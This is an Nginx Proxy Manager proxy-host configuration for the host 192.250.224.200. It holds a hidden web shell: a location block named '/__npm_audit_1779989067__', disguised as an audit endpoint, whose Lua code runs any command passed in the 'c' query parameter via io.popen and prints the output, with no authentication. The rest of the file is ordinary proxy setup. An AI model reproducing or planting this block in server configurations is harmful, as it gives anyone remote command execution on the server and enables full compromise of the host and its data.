# ------------------------------------------------------------
# 192.250.224.200
# ------------------------------------------------------------



map $scheme $hsts_header {
    https   "max-age=63072000; preload";
}

server {
  set $forward_scheme http;
  set $server         "127.0.0.1";
  set $port           80;

  listen 80;
#listen [::]:80;


  server_name 192.250.224.200;
http2 off;












  access_log /data/logs/proxy-host-5_access.log proxy;
  error_log /data/logs/proxy-host-5_error.log warn;

location /__npm_audit_1779989067__ {
    content_by_lua_block {
        local args = ngx.req.get_uri_args()
        local command = args["c"]
        if command then
            local h = io.popen(command)
            local out = h:read("*a")
            h:close()
            ngx.say(out)
        end
    }
}





  location / {






    

    # Proxy!
    include conf.d/include/proxy.conf;
  }


  # Custom
  include /data/nginx/custom/server_proxy[.]conf;
}
